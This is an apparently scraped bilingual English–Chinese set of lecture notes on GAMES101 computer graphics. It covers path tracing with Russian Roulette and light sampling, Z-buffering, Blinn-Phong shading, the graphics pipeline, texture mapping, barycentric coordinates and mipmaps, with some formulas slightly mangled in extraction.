    ​Lo = 0.0

    ​For each wi

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)

    ​Return Lo


    Introducing Global Illumination

    ​全局照明简介

    One more step forward: what if a ray hits an object?

    png

    $Q$ also reflects light to $P$! How much? The dir. illum. at $Q$!

    ​$Q$ 也反射光到 $P$!反射了多少?$Q$ 处的方向光!


    shade(p, wo)

    ​Randomly choose N directions wi~pdf

    ​Lo = 0.0

    ​For each wi

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)

    ​Else If ray r hit an object at q

    ​Lo += (1 / N) * shade(q, -wi) * f_r * cosine / pdf(wi)

    ​Return Lo


    Path Tracing

    ​路径追踪

    Problem 1: Explosion of #rays as #bounces go up:

    png

    ​光线经过几次反射,所产生的光线数量就过多了,显卡就算不过来了。

    From now on, we always assume that only 1 ray is traced at each shading point:

    ​从现在开始,我们始终假设每个着色点只追踪 1 条射线:


    shade(p, wo)

    ​Randomly choose ONE direction wi~pdf(w) // 不用 for 循环了

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Return L_i * f_r * cosine / pdf(wi)

    ​Else If ray r hit an object at q

    ​Return shade(q, -wi) * f_r * cosine / pdf(wi)


    This is path tracing! (FYI, Distributed Ray Tracing if $N \ne 1$)

    ​这是路径追踪! (仅供参考,如果 $N\ne 1$,则为分布式光线追踪)


    Ray Generation

    ​射线生成

    png

    But this will be noisy!

    ​但是这样会产生很多噪声!

    No problem, just trace more paths through each pixel and average their radiance!

    ​但这样会很吵!没问题,只需在每个像素上追踪更多路径并平均它们的辐射度!


    Very similar to ray casting in ray tracing

    ​与光线追踪中的光线投射非常相似


    ray_generation(camPos, pixel)

    ​Uniformly choose N sample positions within the pixel

    ​pixel_radiance = 0.0

    ​For each sample in the pixel

    ​Shoot a ray r(camPos, cam_to_sample)

    ​If ray r hit the scene at p

    ​pixel_radiance += 1 / N * shade(p, sample_to_cam)

    ​Return pixel_radiance


    Now are we good? Any other problems in shade()?


    shade(p, wo)

    ​Randomly choose ONE direction wi~pdf(w)

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Return L_i * f_r * cosine / pdf(wi)

    ​Else If ray r hit an object at q

    ​Return shade(q, -wi) * f_r * cosine / pdf(wi)


    Problem 2: The recursive algorithm will never stop! 递归算法,无限递归!


    ​如果人为限定光线反弹次数:

    Dilemma: the light does not stop bouncing indeed!

    ​困境:光线确实不会停止反弹!

    Cutting #bounces == cutting energy!

    ​减少反弹 == 减少能量!

    png

    png

    ​如此做,3 bounces 和 17 bounces 的亮度是不一样的。


    Solution: Russian Roulette (RR)

    ​解决方案:俄罗斯轮盘赌(RR)

    Russian Roulette is all about probability

    ​俄罗斯轮盘赌完全是概率游戏

    With probability $0 < P < 1$, you are fine

    ​概率 $0 < P < 1$,则没问题

    With probability $1 - P$, otherwise

    ​概率 $1 - P$,另外情况

    png

    Previously, we always shoot a ray at a shading point and get the shading result $L_o$

    ​以前,我们总是向着色点发射射线并得到着色结果 $L_o$

    Suppose we manually set a probability $P (0 < P < 1)$

    ​假设我们手动设置一个概率 $P (0 < P < 1)$

    With probability $P$, shoot a ray and return the shading result divided by $P$: $L_o / P$

    ​以概率 $P$,发射一条射线并返回除以 $P$ 的着色结果:$L_o / P$

    With probability $1-P$, don’ t shoot a ray and you’ ll get $0$

    ​以概率 $1-P$,不发射射线,您将得到 $0$

    In this way, you can still expect to get $L_o$! :

    ​这样,您仍然可以期望得到 $L_o$!:

    $E = P \cdot (L_o / P) + (1 - P) \cdot 0 = L_o$


    shade(p, wo)

    Manually specify a probability P_RR

    Randomly select ksi in a uniform dist. in [0, 1]

    If (ksi > P_RR) return 0.0;

    ​Randomly choose ONE direction wi~pdf(w)

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Return L_i * f_r * cosine / pdf(wi) / P_RR

    ​Else If ray r hit an object at q

    ​Return shade(q, -wi) * f_r * cosine / pdf(wi) / P_RR


    Now we already have a correct version of path tracing!

    ​现在我们已经有了正确版本的路径追踪!

    But it’ s not really efficient.

    ​但它并不是很高效。

    png


    Sampling the Light

    ​光采样

    Understanding the reason of being inefficient

    ​了解效率低下的原因

    png

    there will be 1 ray hitting the light. So a lot of rays are “wasted” if we uniformly sample the hemisphere at the shading point.

    ​会有 1 条射线击中光源。因此,如果我们在着色点处均匀采样半球,则很多射线都会被“浪费”。


    Sampling the Light (pure math)

    ​光采样(纯数学)

    png

    Monte Carlo methods allows any sampling methods, so we can sample the light (therefore no rays are “wasted”)

    ​蒙特卡罗方法允许任何采样方法,因此我们可以对光进行采样(因此不会“浪费”任何光线)

    Assume uniformly sampling on the light:

    ​假设对光进行均匀采样:

    $\text{pdf} = 1 / A (\text{because} \int\text{pdf d}A = 1)$

    But the rendering equation integrates on the solid angle 但渲染方程在立体角上积分: $L_o = \int L_i fr \cos d\omega$.

    Recall Monte Carlo Integration

    ​回想一下蒙特卡罗积分:

    Sample on $x$ & integrate on $x$

    ​在 $x$ 上采样并在 $x$ 上积分

    Since we sample on the light, can we integrate on the light?

    ​由于我们在光上采样,我们可以在光上积分吗?

    Need to make the rendering equation as an integral of $\text dA$

    ​需要将渲染方程作为 $\text dA$ 的积分

    Need the relationship between $\text d\omega$ and $\text dA$

    ​需要 $\text d\omega$ 和 $\text d A$ 之间的关系

    Easy! Recall the alternative def. of solid angle:

    ​简单!回想一下立体角的另一种定义:

    Projected area on the unit sphere

    ​单位球面上的投影面积

    $$d\omega=\frac{dA\cos\theta{\prime}}{|x{\prime}-x|^2}$$

    Then we can rewrite the rendering equation as

    ​然后我们可以将渲染方程重写为

    $$\begin{aligned}
    L_o(x,\omega_o)& \begin{aligned}=\int_{\Omega^+}L_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\cos\theta\mathrm d\omega_i\end{aligned} \
    &\begin{aligned}&=\int_AL_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\frac{\cos\theta\cos\theta’}{|x’-x|^2}\mathrm dA\end{aligned}
    \end{aligned}$$

    Now an integration on the light!

    ​现在对光进行积分!

    Monte Carlo integration:

    ​蒙特卡洛积分:

    “$f(x)$”: everything inside 里面的一切

    $\text{Pdf}: 1 / A$

    png

    Previously, we assume the light is “accidentally” shot by uniform hemisphere sampling

    ​之前,我们假设光线是“意外地”通过均匀半球采样射出的

    Now we consider the radiance coming from two parts:

    ​现在我们考虑来自两部分的辐射:

    1. light source (direct, no need to have RR)

      光源(直接,不需要 RR)

    2. other reflectors (indirect, RR)

      其他反射器(间接,RR)


    shade(p, wo)

    ​# Contribution from the light source.

    Uniformly sample the light at x’ (pdf_light = 1 / A)

    ​L_dir = L_i * f_r * cos θ * cos θ’ / |x’ - p|^2 / pdf_light

    ​# Contribution from other reflectors.

    ​L_indir = 0.0

    ​Test Russian Roulette with probability P_RR

    Uniformly sample the hemisphere toward wi (pdf_hemi = 1 / 2pi)

    ​Trace a ray r(p, wi)

    ​If ray r hit a non-emitting object at q

    ​L_indir = shade(q, -wi) * f_r * cos θ / pdf_hemi / P_RR

    ​Return L_dir + L_indir


    One final thing: how do we know if the sample on the light is not blocked or not?

    ​最后一件事:我们如何知道光上的样本是否被遮挡?

    png


    # Contribution from the light source.

    L_dir = 0.0

    Uniformly sample the light at x’ (pdf_light = 1 / A)

    Shoot a ray from p to x’

    If the ray is not blocked in the middle

    ​L_dir = …


    Now path tracing is finally done!


    Some Side Notes

    ​一些补充说明

    • Path tracing (PT) is indeed difficult

      路径追踪 (PT) 确实很难

      • Consider it the most challenging in undergrad CS

        认为它是本科计算机科学中最具挑战性的

      • Why: physics, probability, calculus, coding

        原因:物理、概率、微积分、编码

      • Learning PT will help you understand deeper in these

        学习 PT 将帮助您更深入地理解这些

    • Is it still “Introductory”?

      它仍然是“入门级”吗?

      • Not really, but it’s “modern" :)

        不是,但它是“现代” :)

      • And so learning it will be rewarding also because …

        因此学习它也会很有价值,因为……


    Is Path Tracing Correct?

    ​Yes, almost 100% correct, a.k.a. PHOTO-REALISTIC

    ​是的,几乎 100% 正确,又名照片级真实感

    png


    Ray tracing: Previous vs. Modern Concepts

    ​光线追踪:过去与现代概念

    • Previous

      早期

      • Ray tracing == Whitted-style ray tracing

        光线追踪 == Whitted 式光线追踪

    • Modern (my own definition)

      现代(我自己的定义)

      • The general solution of light transport, including

        光传输的一般解决方案,包括

      • (Unidirectional & bidirectional) path tracing

    (单向和双向)路径追踪

    • Photon mapping

      光子映射

    • Metropolis light transport

      Metropolis 光传输

    • VCM / UPBP…


    Things we haven’ t covered / won’ t cover

    ​我们没有涉及/不会涉及的内容

    • Uniformly sampling the hemisphere

      均匀采样半球

      • How? And in general, how to sample any function? (sampling)

        如何采样?一般来说,如何采样任何函数? (采样)

    • Monte Carlo integration allows arbitrary pdfs

      蒙特卡罗积分允许任意 pdf

      • What’s the best choice? (importance sampling)

        最佳选择是什么? (重要性采样)

    • Do random numbers matter?

      随机数重要吗?

      • Yes! (low discrepancy sequences)

        是的! (低差异序列)

    • I can sample the hemisphere and the light

      我可以对半球和光线进行采样

      • Can I combine them? Yes! (multiple imp. sampling)

        我可以将它们结合起来吗?是的!(多重采样)

    • The radiance of a pixel is the average of radiance on all
      paths passing through it

      像素的辐射度是通过它的所有路径的辐射度的平均值

      • Why? (pixel reconstruction filter)

        为什么?(像素重建滤波器)

    • Is the radiance of a pixel the color of a pixel?

      像素的辐射度是像素的颜色吗?

      • No. (gamma correction, curves, color space)

        不是。(伽马校正、曲线、色彩空间)

    • Asking again, is path tracing still “Introductory”?

      再次询问,路径追踪仍然是“入门级”吗?

      • This time, yes. Fear the science, my friends.

        这次是的。朋友们,敬畏科学吧。

    ]]>
    @@ -2276,7 +2276,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%883%EF%BC%89/ - 资源

    课程

    Lecture 7: Shading 1 (Illumination, Shading and Graphics Pipeline)

    • Visibility / occlusion 可见 / 遮挡

      • Z-buffering
    • Shading 阴影

      • Illumination & Shading 照明和阴影
      • Graphics Pipeline

    Visibility / occlusion

    ​对于由多个物体前后遮挡构成的场景,计算机该如何渲染图像?

    ​最简单的想法:画家算法 Painter’s Algorithm

    ​Inspired by how painters paint Paint from back to front, overwrite in the framebuffer.

    ​先画场景中远的面,再画近的面覆盖帧缓冲器。

    png

    ​Requires sorting in depth ($O(n\log n)$ for $n$ triangles)

    ​要对各种面的深度进行排序,因此这个算法的时间复杂度为 $O(n\log n)$。

    png

    ​Can have unresolvable depth order.

    ​这个算法有局限性,对上图这种互相重叠的三角形无解。


    Z-Buffer

    This is the algorithm that eventually won.

    这是最终采用的算法。

    Idea:

    • Store current min. z-value for each sample (pixel)

      对于每个像素,存储其 min. z-value

    • Needs an additional buffer for depth values

      需要一个额外的深度值缓冲区

      • frame buffer stores color values

        帧缓冲区存储颜色值

      • depth buffer (z-buffer) stores depth

        深度缓冲区(z-buffer)存储深度

    IMPORTANT: For simplicity we suppose $z$ is always positive (smaller $z$ -> closer, larger $z$ -> further)

    重要:为了简便计算,我们规定 $z$ 恒正,$z$ 越小越近,$z$ 越大越远。


    Z-Buffer Example

    png

    ​Z-Buffer 的示例,深度缓冲区存了一张深度图,深度图的灰度表示 $z$(越黑越近,越白越远)。


    Z-Buffer Algorithm

    将深度缓冲区初始化为 $\infty$
    During rasterization 光栅化过程中:

    for (each triangle T)
    for (each sample (x,y,z) in T)
    if (z < zbuffer[x,y]) // closest sample so far 如果当前深度值比深度缓冲区里的还要小(这个三角形离摄像机更近)
    framebuffer[x,y] = rgb; // update color 更新帧缓冲区里的颜色
    zbuffer[x,y] = z; // update depth 更新深度缓冲区里的深度
    else
    ; // do nothing, this sample is occluded 这个三角形被遮挡了,不管它了

    png

    ​示例。一开始深度缓冲区里的深度值都是 $R$(无限)。先渲染红的,再渲染紫的。紫色的深度值如果比红的小,就覆盖掉。


    Z-Buffer Complexity

    Complexity

    • $O(n)$ for $n$ triangles (assuming constant coverage)

      时间复杂度 $O(n)$

    • How is it possible to sort $n$ triangles in linear time?

      怎么可能在线性时间内对 $n$ 个三角形排序?(空间换时间吧应该)

    Drawing triangles in different orders?

    用不同的顺序画三角形?

    • 深度值是浮点数,一般很难出现两个三角形中深度值相同的情况。因此不同的顺序画三角形的结果一般相同。如果两个三角形的深度值真的相同了,暂时也不考虑……

    Most important visibility algorithm

    最重要的可见性算法

    • Implemented in hardware for all GPUs

      在所有 GPU 的硬件中实现

    Shading

    What We’ve Covered So Far

    png

    ​在前面的课程中我们已经知道了计算机是怎么光栅化的。

    • Position objects and thecamera in the world

      在场景中放置物体和摄影机

    • Compute position of objectsrelative to the camera

      计算场景中物体与摄影机的相对位置

    • Project objects onto the screen

      将物体投影至屏幕上

    • Sample triangle coverage

      三角形采样覆盖(在屏幕上确定三角形的哪些像素需要被渲染的过程)


    Shading: Definition

    • In Merriam-Webster Dictionary

      在韦氏词典中

      shad·ing, [ˈʃeɪdɪŋ], noun

      The darkening or coloring of an illustration or diagram with parallel lines or a block of color.

      用平行线或色块使插图或图表变暗或上色。

    • In this course

      在本课程中

      The process of applying a material to an object.

      Shading 表示将材质应用到物体上的过程。


    A Simple Shading Model (Blinn-Phong Reflectance Model)

    一个简单的 Shading 模型——Blinn-Phong 模型。


    Perceptual Observations

    png

    ​感性地观察真实世界的情况,物体分为三个面:

    • Specular highlights

      高光面

    • Diffuse reflection

      漫反射面

    • Ambient lighting

      环境照明

      • 在现实世界中,我们看到物体有颜色是因为物体反射出对应颜色的光进入我们的人眼。

        如果一个物体不反射出光,则它将是一片黑。因此,如果只考虑直射的光,那么背光面将反射不出任何光,将会一片漆黑,这显然不现实。现实生活中背光面还会接收到其它面反射多次过来的光,不至于一片漆黑。

        而在计算机中,为了便于计算,就定义一个环境照明模拟其它面反射过来的光,使得背光面不至于一片漆黑。


    Shading is Local

    Compute light reflected toward camera at a specific shading point.

    计算在特定阴影点反射到相机的光。

    png

    Inputs 输入(均为单位向量):

    • Viewer direction 观察者向量, $\mathbf{v}$
    • Surface normal 表面法线向量, $\mathbf{n}$
    • Light direction 光照方向向量, (for each of many lights)
    • Surface parameters 表面参数 (color 颜色, shininess 亮度, …)

    png

    No shadows will be generated! (shading ≠ shadow)

    ​shading 和 shadow 是两码事,这个算法将不会产生任何阴影。


    Diffuse Reflection

    png

    • Light is scattered uniformly in all directions

      光在各个方向均匀地散射

      • Surface color is the same for all viewing directions

        对于所有观察方向,表面颜色是相同的

    png

    • But how much light (energy) is received?

      但是接收了多少光(能量)呢?

      • Lambert’s cosine law

        兰伯特余弦定律

    ​单位面积的表面接收到的光的能量与表面法线方向 $\mathbf n$ 与光的入射方向 $\mathbf l$ 的夹角 $\theta$ 有关。夹角越小,接受的光的能量越多,因此 $\cos \theta=\mathbf l \cdot \mathbf n$。


    Light Falloff

    png

    ​对于点光源,某个点接收到的光的强度与这个点到点光源的位置有关。

    ​假设点光源的能量为 $I$,且在传播中没有能量损失。

    ​那么如图所示,每个圈的能量综合为 $I$,那么这个点接收到的光的强度与这个点到点光源的距离 $r$ 的平方成反比,为 $I/r^2$。


    Lambertian (Diffuse) Shading

    png

    ​综上所述,我们得到了兰伯特漫反射光照模型:

    $$L_d=k_d(I/r^2)\max(0, \mathbf n\cdot\mathbf l)$$

    • $L_d$:diffusely reflected light

      漫反射光

    • $k_d$:diffuse coefficient (color)

      漫射系数(颜色)

    • $\max(0, \mathbf n\cdot\mathbf l)$:energy received by the shading point

      shading point 接收到的光的能量,$\max()$ 是为了防止光线从平面下方照射过来的情况

    ​Shading independent of view direction

    ​$L_d$ 与 $\mathbf n$ 和 $\mathbf v$ 之间的夹角无关,因此我们说 shading 独立于视图方向


    Produces diffuse appearance

    png

    ​最后的渲染结果,$k_d$ 越强,物体越亮。

    Lecture 8: Shading 2 (Shading, Pipeline and Texture Mapping)

    • Shading 2

      • Blinn-Phong reflectance model

        • Specular and ambient terms

          环境光和镜面反射

      • Shading frequencies

        着色频率

      • Graphics pipeline

        图形管线

      • Texture mapping

        纹理映射

      • Barycentric coordinates

        重心坐标

    Blinn-Phong reflectance model

    Specular Term (Blinn-Phong)

    镜面反射

    png

    Intensity depends on view direction

    镜面反射的强度取决于观察者的方向

    • Bright near mirror reflection direction

      在镜面反射中,光线反射的方向 $\mathbf R$ 与观察者的视线 $\mathbf v$ 非常接近,因此产生了明亮的反射效果


    $\mathbf v$ close to mirror direction $\Leftrightarrow$ half vector near normal

    在 Blinn-Phong 镜面反射模型中,

    将观察角度 $\mathbf v$ 与镜面反射角度之间的夹角的计算

    转换为

    光线入射角度 $\mathbf l$ 与观察角度 $\mathbf v$ 的半程向量(角平分线方向)$\mathbf h$ 与法线方向 $\mathbf n$ 的夹角。

    • Measure “near” by dot product of unit vectors

      用单位向量的点积来度量“近”

    png

    ​因此高光(镜面反射光的计算公式):

    $$L_s=k_s(I/r^2)\max(0,\mathbf n\cdot\mathbf h)^p$$

    ​其中 $k_s$ 为镜面反射系数。

    png

    ​为什么 $\max(0, \mathbf n\cdot \mathbf h)$ 后要加 $p$ 次方?这是为了调整高光面积。

    png

    ​$p$ 值越大,光斑越小。


    Ambient Term

    环境光照

    Shading that does not depend on anything
    不依赖任何东西的 Shading

    • Add constant color to account for disregarded illumination and fill in black shadows

      添加恒定的颜色,以说明忽略照明和填充黑色阴影

    • This is approximate / fake!

      这是近似的/假的!

    png

    $$L_a=k_aI_a$$

    ​环境光强度=环境系数 * 环境光强度


    Blinn-Phong Reflection Model

    png

    ​综上所述,我们得到了一个完整的 Blinn-Phong 反射模型:

    $$\begin{aligned}\text{L}&=L_a+L_d+L_s\&=k_aI_a+k_d(I/r2)\max(0,\mathbf{n}\cdot\mathbf{l})+k_s(I/r2)\max(0,\mathbf{n}\cdot\mathbf{h})^p\end{aligned}$$

    ​Blinn-Phong 反射 = Ambient 环境光照 + Diffuse 漫反射 + Specular 高光

    Shading frequencies

    Shading Frequencies

    渲染频率

    What caused the shading difference?

    png

    ​不同的渲染频率得到不同的渲染效果。


    Shade each triangle (flat shading)

    png

    Flat shading

    • Triangle face is flat——one normal vector

      对于一个模型来说,每个三角形具有一个法线向量,因此每个三角形看上去都是平的。

    • Not good for smooth surfaces

      对平滑物体效果不好。


    Shade each vertex (Gouraud shading)

    png

    Gouraud shading

    • Interpolate colors from vertices across triangle

      每个顶点都有一个颜色,平面的颜色由各个顶点之间的颜色插值得到。

    • Each vertex has a normal vector (how?)

      每个顶点具有一个法线向量


    Shade each pixel (Phong shading)

    png

    Phong shading

    • Interpolate normal vectors across each triangle

      法线向量会在三角形的表面上进行插值,以获得每个像素处的法线向量

    • Compute full shading model at each pixel

      对于每个像素,利用插值得到的法线向量和光照模型。

    • Not the Blinn-Phong Reflectance Model

      跟 Blinn-Phong 反射模型是一个人提出来的,但是这两个东西是两码事。


    Shading Frequency: Face, Vertex or Pixel

    png

    ​如果模型的面数足够多,那么 Flat Shading 和 Gouraud Shading 也可以得到类似 Phong Shading 的效果。


    Defining Per-Vertex Normal Vectors

    ​如何得到顶点法线?

    ​Best to get vertex normals from the underlying geometry

    ​最好的得到顶点法线向量的方法是从基础几何图形(矢量图形?)处得到。

    png

    • e.g. consider a sphere

      如上图所示,如果计算机知道这是一个球,那么就很好知道顶点法线向量。

    ​Otherwise have to infer vertex normals from triangle faces

    ​但是一般情况下计算机并不知道,只能从三角形面推断顶点法线向量。

    png

    • Simple scheme: average surrounding face normals

      简单方案:取周围面法线的平均值

    $$N_v=\frac{\sum_iN_i}{||\sum_iN_i||}$$


    Barycentric interpolation (introducing soon) of vertex normals

    ​顶点法线的重心插值(下节课再说)

    png

    ​Don’t forget to normalize the interpolated directions

    ​不要忘记对插值方向进行规范化

    Graphics pipeline

    Graphics (Real-time Rendering) Pipeline

    现在我们再来回顾一下实时场景渲染的管线。

    png

    渲染管线流程

    1. Vertex Processing

      处理顶点

    2. Triangle Processing

      处理三角形面

    3. Rasterization

      光栅化

    4. Fragment Processing

      处理片元(这个 Fragment 可以视为未经过抗锯齿等后处理的像素)

    5. Framebuffer Operations

      帧缓冲操作

    png

    Model, View, Projection transforms 属于 Vertex Processing,放置场景,得到 vertices in 3D space

    png

    Sampling triangle coverage 属于 Rasterization,将三维场景的顶点映射到二维屏幕上,得到 fragments

    png

    Z-Buffer Visibility Tests 属于 Fragment Processing,是计算最终 Fragment 颜色的一部分。

    png

    Shading 既可属于 Vertex Processing,也可属于 Fragment Processing

    ​Shader 中就分为顶点着色器 Vertex Shader 和片元着色器 Fragment Shader,应该就是这回事。

    png

    ​Texture mapping 既可属于 Vertex Processing,也可属于 Fragment Processing。给模型贴图。


    Shader Programs

    着色器程序

    • Program vertex and fragment processing stages

      既可属于 Vertex Processing,也可属于 Fragment Processing

    • Describe operation on a single vertex (or fragment)

      描述某个顶点或片元颜色的操作

    uniform sampler2D myTexture; // program parameter 程序参数
    uniform vec3 lightDir; // program parameter 程序参数
    varying vec2 uv; // per fragment value (interp. by rasterizer) 每个片元特有的值
    varying vec3 norm; // per fragment value (interp. by rasterizer) 每个片元特有的值

    void diffuseShader()
    {
    vec3 kd; // 漫反射系数(颜色)
    kd = texture2d(myTexture, uv); // material color from texture 从 UV 贴图中获取材质颜色
    kd *= clamp(dot(–lightDir, norm), 0.0, 1.0); // Lambertian shading model,应用兰伯特漫反射光照模型,将 kd 乘以后面这东西得到 Ld(漫反射光)
    gl_FragColor = vec4(kd, 1.0); // output fragment color 输出片元颜色
    }

    Shader function executes once per fragment.

    Shader 函数对每个片元执行一次(因此不用像 C 语言那样遍历所有顶点,它自动帮你遍历好了)。

    • Outputs color of surface at the current fragment’s screen sample position.

      输出当前片段屏幕样本位置表面的颜色。

    • This shader performs a texture lookup to obtain the surface’s material color at this point, then performs a diffuse lighting calculation.

      这个着色器执行纹理查找以获得表面的材质颜色,然后执行漫反射照明计算。

    Snail (shadertoy.com) 这是一个很牛逼的 shader 渲染实例。


    Goal: Highly Complex 3D Scenes in Realtime

    目标:高复杂度的实时 3D 场景渲染

    • 100’ s of thousands to millions of triangles in a scene

      场景中有成千上万到数百万个三角形

    • Complex vertex and fragment shader computations

      复杂的顶点和片段着色计算

    • High resolution (2-4 megapixel + supersampling)

      高分辨率(2-4 百万像素+超采样)

    • 30-60 frames per second (even higher for VR)

      每秒 30-60 帧(VR 甚至更高)


    Graphics Pipeline Implementation: GPUs

    图形管道实现:gpu

    png

    ​Specialized processors for executing graphics pipeline computations

    ​图形管道流程需要大量并行运算,因此需要 GPU——用于执行图形管道计算的专用处理器。

    png

    ​GPU 的结构示意图。

    Texture mapping

    Texture Mapping

    Different Colors at Different Places?

    png

    ​对于兰伯特漫反射光照模型,其中的 $k_d$ 是怎么得来的?


    Surfaces are 2D

    表面都是 2D 的

    png

    Surface lives in 3D world space

    表面在 3D 空间中

    Every 3D surface point also has a place where it goes in the 2D image (texture).

    每个 3D 表面点在 2D 图像(纹理)中也有一个位置。


    Texture Applied to Surface

    Texture Applied to Surface

    png

    Each triangle “copies” a piece of the texture image to the surface

    每个三角形将纹理图像的一部分“复制”到表面


    Visualization of Texture Coordinates

    png

    Each triangle vertex is assigned a texture coordinate $(u,v)$

    每个三角形顶点分配一个纹理坐标 $(u,v)$

    这么表示 UV 贴图的情况,越红 $u$ 值越高,越绿 $v$ 值越高。


    Texture Applied to Surface

    png

    ​这个 UV 贴图是从美术人员那边获得的,咱们程序员不管这个!


    Textures applied to surfaces

    png

    ​一个贴图示例。


    Visualization of texture coordinates

    png

    ​这个模型由若干 UV 贴图平铺而成。


    Textures can be used multiple times!

    png

    ​这就需要美工人员整一个无缝贴图了!

    Lecture 09 Shading 3 (Texture Mapping Cont.)

    • Shading 3

      • Barycentric coordinates

        重心坐标

      • Texture queries

        纹理查询

      • Applications of textures

        纹理的应用

    Barycentric coordinates

    Interpolation Across Triangles

    三角形内插

    Why do we want to interpolate?

    为什么要进行插值呢?

    • Specify values at vertices

      指定顶点的值

    • Obtain smoothly varying values across triangles

      获取平滑的三角形变换值

    What do we want to interpolate?

    我们想要对什么样的值进行插值运算?

    • Texture coordinates, colors, normal vectors, …

      纹理坐标,颜色,法向量,…

    How do we interpolate?

    我们该如何进行插值呢?

    • Barycentric coordinates

      重心坐标


    Barycentric Coordinates

    重心坐标

    png

    ​三角形的坐标系统:

    ​三角形 $\bigtriangleup_{ABC}$ 所在平面上的点可用三角形的顶点坐标的线性变换表示:$(x,y)=\alpha A+\beta B+\gamma C$,且 $\alpha+\beta+\gamma=1$

    ​额外的,Inside the triangle if all three coordinates are non-negative,如果这个点在三角形内,则 $\alpha,\beta,\gamma$ 均非负。

    png

    ​如果这个点恰好是 $A$ 点,则 $\alpha=1,\beta=0,\gamma=0$。


    png

    ​对于三角形内部的点,其重心坐标的 $\alpha,\beta,\gamma$ 由这个点与三角形顶点的连线再与原三角形所形成的三角形的面积所决定。

    $$\alpha=\frac{A_A}{A_A+A_B+A_C}\\beta=\frac{A_B}{A_A+A_B+A_C}\\gamma=\frac{A_C}{A_A+A_B+A_C}$$


    png

    ​如果这个点刚好是三角形的重心,则它的重心坐标为 $(\frac{1}{3},\frac{1}{3},\frac{1}{3})$。


    png

    ​$(x,y)$ 的重心坐标公式:

    $$\begin{aligned}&\alpha=\frac{-(x-x_B)(y_C-y_B)+(y-y_B)(x_C-x_B)}{-(x_A-x_B)(y_C-y_B)+(y_A-y_B)(x_C-x_B)}\&\beta=\frac{-(x-x_C)(y_A-y_C)+(y-y_C)(x_A-x_C)}{-(x_B-x_C)(y_A-y_C)+(y_B-y_C)(x_A-x_C)}\&\gamma=1-\alpha-\beta\end{aligned}$$


    Using Barycentric Coordinates

    使用重心坐标

    Linearly interpolate values at vertices

    在顶点处线性插值

    png

    ​这个用于插值计算的值 $V_A,V_B,V_C$ 可以是位置,纹理坐标,颜色,法线,深度,材料属性等,通过计算获取平滑的三角形变换值。

    ​However, barycentric coordinates are not invariant under projection!

    ​如果三角形作了投影变换,那么重心坐标会改变!所以这个操作应该在投影变换之前。

    Texture queries

    Simple Texture Mapping: Diffuse Color

    简单纹理映射:漫反射颜色

    for each rasterized screen sample (x, y):  # 对于每个栅格化屏幕样本(x, y),通常是像素中心
    (u, v) = evaluate texture coordinate at (x, y) # 在 (x, y) 计算纹理坐标 (u, v),Using barycentric coordinates!
    texcolor = texture.sample(u, v); # 从 (u, v) 出获取颜色
    set sample’s color to texcolor; # 设置样本的颜色为 texcolor,通常是漫射反照率 Kd,(回想一下 Blinn-Phong 反射模型)

    Texture Magnification - Easy Case

    纹理贴图太小了怎么办?

    Generally don’t want this — insufficient texture resolution

    一般不希望这样-纹理分辨率不足

    A pixel on a texture — a texel

    我们把纹理贴图上的一个像素称之为 texel(纹理元素、纹素)

    png

    ​三种处理方法:

    Nearest 取最邻近的 texel

    Bilinear 双线性插值

    Bicubic 双三次插值,一种利用待采样点周围 16 个点的灰度值作三次插值的复杂算法


    Bilinear Interpolation

    双线性插值

    png

    ​假设我们想要对红点处 $(x,y)$ 求出其纹理颜色值 $f(x,y)$。

    png

    ​考虑红点处周围 4 个点,插值两次,得到 $f(x,y)=\mathrm{lerp}(t,u_0,u_1)$。


    png

    ​Bilinear interpolation usually gives pretty good results at reasonable costs.

    ​双线性插值通常以合理的成本给出相当好的结果。


    Texture Magnification (hard case)

    如果纹理贴图太大了怎么办?

    png

    ​纹理贴图太大导致的后果——近处有 Jaggies 锯齿,远处有 Moire 摩尔纹,远处的频率太高了比采样的频率还高导致的。


    Screen Pixel “Footprint” in Texture

    纹理中的屏幕像素“足迹”

    png

    png

    ​近处的每个像素点包含的纹理贴图部分少,远处的每个像素点包含的纹理贴图部分多。


    Will Supersampling Do Antialiasing?

    如果使用抗锯齿进行超采样会怎么样?

    png

    ​好使,但是渲染成本太高!


    Antialiasing — Supersampling?

    抗锯齿——超采样?

    Will supersampling work?

    超采样有效吗?

    • Yes, high quality, but costly

      是的,高质量,但是成本高

    • When highly minified, many texels in pixel footprint

      当高度缩小时,在像素足迹中有许多纹理

    • Signal frequency too large in a pixel

      一个像素的信号频率太大

    • Need even higher sampling frequency

      需要更高的采样频率

    Let’ s understand this problem in another way

    让我们用另一种方式来理解这个问题

    • What if we don’t sample?

      如果我们不采样怎么办?

    • Just need to get the average value within a range!

      只需要得到一个范围内的平均值!


    Mipmap

    Allowing (fast, approx., square) range queries

    允许(快速,近似,正方形)的纹理查询

    png

    ​“Mip” comes from the Latin “multum in parvo”, meaning a multitude in a small space

    ​“Mip”来自拉丁语“multum in parvo”,意思是一个小空间里的许多人

    ​多耗费 $\frac{1}{3}$ 的存储空间存储 Mipmap。

    png

    ​多层 $D$ 的 Mip 金字塔。


    Computing Mipmap Level D

    png

    ​Estimate texture footprint using texture coordinates of neighboring screen samples

    ​使用相邻屏幕采样点的纹理坐标来估算纹理印记。

    png

    $$D=\log_2{L}$$

    $$L=\max\left(\sqrt{\left(\frac{du}{dx}\right)2+\left(\frac{dv}{dx}\right)2},\sqrt{\left(\frac{du}{dy}\right)2+\left(\frac{dv}{dy}\right)2}\right)$$

    ​所使用的 Mipmap 的 level $D$ 由像素的纹理坐标与周边像素的纹理坐标之间的距离决定。


    Visualization of Mipmap Level

    Mipmap 等级可视化

    png

    ​看上去一格一格的。


    Trilinear Interpolation

    三线性插值

    png

    ​因此要对 $D$ 和 $D+1$ 之间再做一个线性插值。


    Visualization of Mipmap Level

    Mipmap 等级可视化

    png

    ​插值后的 Mipmap level 看起来好极了!


    Mipmap Limitations
